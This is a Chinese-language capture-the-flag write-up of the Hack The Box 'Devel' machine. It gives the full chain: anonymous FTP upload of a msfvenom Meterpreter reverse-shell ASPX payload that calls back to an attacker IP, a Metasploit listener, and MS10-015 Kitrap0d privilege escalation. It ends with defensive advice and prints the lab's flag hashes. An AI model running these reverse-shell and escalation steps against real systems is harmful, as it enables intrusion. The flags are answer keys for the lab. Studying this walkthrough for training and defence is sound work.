[Meachines] [Easy] Devel FTP匿名访问文件上传+MS10-015权限提升
字数 1069 2025-08-20 18:18:40

Windows渗透测试教学:FTP匿名访问与MS10-015权限提升

1. 信息收集阶段

1.1 目标扫描

使用Nmap进行端口扫描:

nmap -p- 10.10.10.5 --min-rate 1000 -sC -sV

扫描结果:

  • 开放端口:
    • 21/tcp (FTP): Microsoft ftpd,允许匿名登录
    • 80/tcp (HTTP): Microsoft IIS httpd 7.5

1.2 服务详情

  • FTP服务:

    • 允许匿名登录(FTP code 230)
    • 目录内容:
      • aspnet_client (目录)
      • iisstart.htm (689字节)
      • welcome.png (184946字节)

  • HTTP服务:

    • Microsoft-IIS/7.5
    • 潜在风险方法:TRACE

2. 初始访问:FTP文件上传

2.1 生成Meterpreter反向TCP载荷

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.24 LPORT=10032 -f aspx > shell.aspx

2.2 通过FTP上传Web Shell

ftp 10.10.10.5

登录凭据:

  • 用户名:anonymous
  • 密码:anonymous

上传文件:

put shell.aspx

2.3 设置监听器

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.16.24
set LPORT 10032
run

2.4 触发Web Shell

curl http://10.10.10.5/shell.aspx

3. 权限提升:MS10-015 (Kitrap0d)

3.1 漏洞信息

  • CVE编号:CVE-2010-0232
  • 漏洞类型:Windows内核特权提升漏洞
  • 影响系统:Windows操作系统

3.2 漏洞原理

  1. 不正确的特权检查

    • CSRSS(Client/Server Runtime Subsystem)进程具有高权限
    • 内核处理特定系统调用时未正确验证调用上下文

  2. 系统调用权限绕过

    • 攻击者可创建特制请求,使系统误认为低权限进程拥有高权限
    • 允许执行通常需要系统权限的操作

  3. 特权提升

    • 从用户模式提升到内核模式
    • 执行任意代码
    • 从标准用户账户获得系统权限

3.3 漏洞利用步骤

  1. 首先检查系统信息:
systeminfo
  1. 使用Metasploit的本地漏洞建议模块:
use post/multi/recon/local_exploit_suggester
  1. 使用MS10-015漏洞利用模块:
use exploit/windows/local/ms10_015_kitrap0d
set session 1
set lhost 10.10.16.24
exploit

4. 获取标志

  • 用户标志(User.txt): a6a2e101fcf3865491bd4521eb1f84fc
  • 根标志(Root.txt): 626f13a715fb1239018637d32592db59

5. 防御措施

  1. FTP服务

    • 禁用匿名FTP访问
    • 使用强密码策略
    • 限制FTP目录的写入权限

  2. Web服务

    • 禁用不必要的HTTP方法(如TRACE)
    • 定期更新IIS
    • 限制上传文件类型

  3. MS10-015漏洞

    • 安装微软安全更新KB977165
    • 定期更新操作系统补丁
    • 使用最小权限原则运行服务

  4. 系统加固

    • 启用Windows防火墙
    • 配置适当的访问控制列表(ACL)
    • 监控异常系统活动
Windows渗透测试教学:FTP匿名访问与MS10-015权限提升 1. 信息收集阶段 1.1 目标扫描 使用Nmap进行端口扫描: 扫描结果: 开放端口: 21/tcp (FTP): Microsoft ftpd,允许匿名登录 80/tcp (HTTP): Microsoft IIS httpd 7.5 1.2 服务详情 FTP服务: 允许匿名登录(FTP code 230) 目录内容: aspnet_ client (目录) iisstart.htm (689字节) welcome.png (184946字节) HTTP服务: Microsoft-IIS/7.5 潜在风险方法:TRACE 2. 初始访问:FTP文件上传 2.1 生成Meterpreter反向TCP载荷 2.2 通过FTP上传Web Shell 登录凭据: 用户名:anonymous 密码:anonymous 上传文件: 2.3 设置监听器 2.4 触发Web Shell 3. 权限提升:MS10-015 (Kitrap0d) 3.1 漏洞信息 CVE编号:CVE-2010-0232 漏洞类型:Windows内核特权提升漏洞 影响系统:Windows操作系统 3.2 漏洞原理 不正确的特权检查 : CSRSS(Client/Server Runtime Subsystem)进程具有高权限 内核处理特定系统调用时未正确验证调用上下文 系统调用权限绕过 : 攻击者可创建特制请求,使系统误认为低权限进程拥有高权限 允许执行通常需要系统权限的操作 特权提升 : 从用户模式提升到内核模式 执行任意代码 从标准用户账户获得系统权限 3.3 漏洞利用步骤 首先检查系统信息: 使用Metasploit的本地漏洞建议模块: 使用MS10-015漏洞利用模块: 4. 获取标志 用户标志(User.txt): a6a2e101fcf3865491bd4521eb1f84fc 根标志(Root.txt): 626f13a715fb1239018637d32592db59 5. 防御措施 FTP服务 : 禁用匿名FTP访问 使用强密码策略 限制FTP目录的写入权限 Web服务 : 禁用不必要的HTTP方法(如TRACE) 定期更新IIS 限制上传文件类型 MS10-015漏洞 : 安装微软安全更新KB977165 定期更新操作系统补丁 使用最小权限原则运行服务 系统加固 : 启用Windows防火墙 配置适当的访问控制列表(ACL) 监控异常系统活动